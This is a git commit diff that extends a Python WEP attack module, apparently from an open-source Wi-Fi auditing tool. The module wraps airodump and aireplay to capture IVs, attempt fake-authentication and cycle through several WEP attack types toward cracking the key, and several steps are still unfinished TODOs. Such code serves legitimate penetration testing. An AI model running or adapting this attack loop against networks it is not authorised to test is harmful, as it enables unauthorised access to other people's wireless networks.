Working on getting WEP attacks finished
Lots of small fixes/tweaks/changes.
This commit is contained in:
derv82
@@ -4,6 +4,7 @@ from Attack import Attack
|
||||
from Airodump import Airodump
|
||||
from Aireplay import Aireplay, WEPAttackType
|
||||
from Configuration import Configuration
|
||||
from Interface import Interface
|
||||
from Color import Color
|
||||
|
||||
import time
|
||||
@@ -26,20 +27,85 @@ class AttackWEP(Attack):
|
||||
# First, start Airodump process
|
||||
with Airodump(channel=self.target.channel,
|
||||
target_bssid=self.target.bssid,
|
||||
ivs_only=True, # Only capture IVs packets
|
||||
output_file_prefix='wep') as airodump:
|
||||
|
||||
airodump_target = self.wait_for_target(airodump)
|
||||
|
||||
for attack_num in xrange(1, 6):
|
||||
pass
|
||||
#aireplay = Aireplay(self.target, attack_num)
|
||||
'''
|
||||
TODO (pending until I get a router to test on)
|
||||
* Wait for IVS to start flowing, e.g. sleep(1).
|
||||
* if IVS > threshold, start cracking.
|
||||
* Check aireplay.is_running() to see if it completed/failed.
|
||||
* Continue attacks depending on aireplay status.
|
||||
'''
|
||||
if self.fake_auth():
|
||||
# We successfully authenticated!
|
||||
# Use our interface's MAC address for the attacks.
|
||||
client_mac = Interface.get_mac()
|
||||
elif len(airodump_target.clients) == 0:
|
||||
# There are no associated clients. Warn user.
|
||||
Color.pl('{!} {O}there are no associated clients{W}')
|
||||
Color.pl('{!} {R}WARNING: {O}many attacks will not succeed' +
|
||||
' without fake-authentication or associated clients{W}')
|
||||
client_mac = None
|
||||
else:
|
||||
client_mac = airodump_target.clients[0].station
|
||||
|
||||
aircrack = None # Aircrack process, not started yet
|
||||
|
||||
wep_attack_types = [
|
||||
'replay',
|
||||
'chopchop',
|
||||
'fragment',
|
||||
'caffelatte',
|
||||
'p0841',
|
||||
'hirte'
|
||||
]
|
||||
for attack_name in wep_attack_types:
|
||||
# Convert to WEPAttackType.
|
||||
wep_attack_type = WEPAttackType(attack_name)
|
||||
|
||||
# Start Aireplay process.
|
||||
aireplay = Aireplay(self.target, \
|
||||
wep_attack_type, \
|
||||
client_mac=client_mac)
|
||||
|
||||
# Loop until attack completes.
|
||||
while True:
|
||||
airodump_target = self.wait_for_target(airodump)
|
||||
Color.p('\r{+} WEP attack {C}%s{W} ({G}%d IVs{W}) '
|
||||
% (attack_name, airodump_target.ivs))
|
||||
|
||||
# TODO: Check if we cracked it.
|
||||
# if aircrack and aircrack.cracked():
|
||||
|
||||
# Check number of IVs, crack if necessary
|
||||
if airodump_target.ivs > Configuration.wep_crack_at_ivs:
|
||||
# TODO:
|
||||
# 1. Check if we're already trying to crack:
|
||||
# aircrack and aircrack.is_running()
|
||||
# 2. If not, start cracking:
|
||||
# aircrack = Aircrack(airodump_target, capfile)
|
||||
pass
|
||||
|
||||
if not aireplay.is_running():
|
||||
# Some Aireplay attacks loop infinitely
|
||||
if attack_name == 'chopchop' or attack_name == 'fragment':
|
||||
print '\nChopChop stopped, output:'
|
||||
print aireplay.get_output()
|
||||
# We expect these to stop once a .xor is created
|
||||
# TODO:
|
||||
# Check for .xor file.
|
||||
# If it's not there, the process failed. Check stdout.
|
||||
# If xor exists, run packetforge-ng on it.
|
||||
# If packetforge created the .cap file to replay, then replay it
|
||||
# Change attack_name to 'forged arp replay'
|
||||
# Start Aireplay by replaying the cap file
|
||||
pass
|
||||
else:
|
||||
print '\naireplay.get_output() =', aireplay.get_output()
|
||||
raise Exception('Aireplay exited unexpectedly')
|
||||
|
||||
# TODO:
|
||||
# Replay: Check if IVS stopped flowing (same for > 20 sec)
|
||||
# If so, restart the Replay attack.
|
||||
|
||||
time.sleep(1)
|
||||
continue
|
||||
|
||||
|
||||
def fake_auth(self):
|
||||
@@ -48,6 +114,8 @@ class AttackWEP(Attack):
|
||||
Returns: True if successful,
|
||||
False is unsuccesful.
|
||||
'''
|
||||
Color.p('{+} attempting {G}fake-authentication{W} with {C}%s{W}...'
|
||||
% self.target.bssid)
|
||||
start_time = time.time()
|
||||
aireplay = Aireplay(self.target, 'fakeauth')
|
||||
process_failed = False
|
||||
@@ -56,7 +124,7 @@ class AttackWEP(Attack):
|
||||
aireplay.stop()
|
||||
process_failed = True
|
||||
break
|
||||
time.sleep(1)
|
||||
time.sleep(0.1)
|
||||
|
||||
# Check if fake-auth was successful
|
||||
if process_failed:
|
||||
@@ -66,8 +134,9 @@ class AttackWEP(Attack):
|
||||
fakeauth = 'association successful' in output.lower()
|
||||
|
||||
if fakeauth:
|
||||
Color.pl('{+} {G}fake-authentication successful{W}')
|
||||
Color.pl(' {G}success{W}')
|
||||
else:
|
||||
Color.pl(' {R}failed{W}')
|
||||
if Configuration.require_fakeauth:
|
||||
# Fakeauth is requried, fail
|
||||
raise Exception(
|
||||
@@ -86,9 +155,8 @@ class AttackWEP(Attack):
|
||||
|
||||
if __name__ == '__main__':
|
||||
from Target import Target
|
||||
fields = "30:85:A9:39:D2:18, 2015-05-27 19:28:44, 2015-05-27 19:28:46, 6, 54, WPA2, CCMP TKIP,PSK, -58, 2, 0, 0. 0. 0. 0, 9, Uncle Router's Gigabit LAN Party, ".split(',')
|
||||
fields = "A4:2B:8C:16:6B:3A, 2015-05-27 19:28:44, 2015-05-27 19:28:46, 6, 54e,WEP, WEP, , -58, 2, 0, 0. 0. 0. 0, 9, Test Router Please Ignore, ".split(',')
|
||||
target = Target(fields)
|
||||
wep = AttackWEP(target)
|
||||
wep.fake_auth()
|
||||
|
||||
wep.run()
|
||||
|
||||
|
||||
Reference in New Issue
Block a user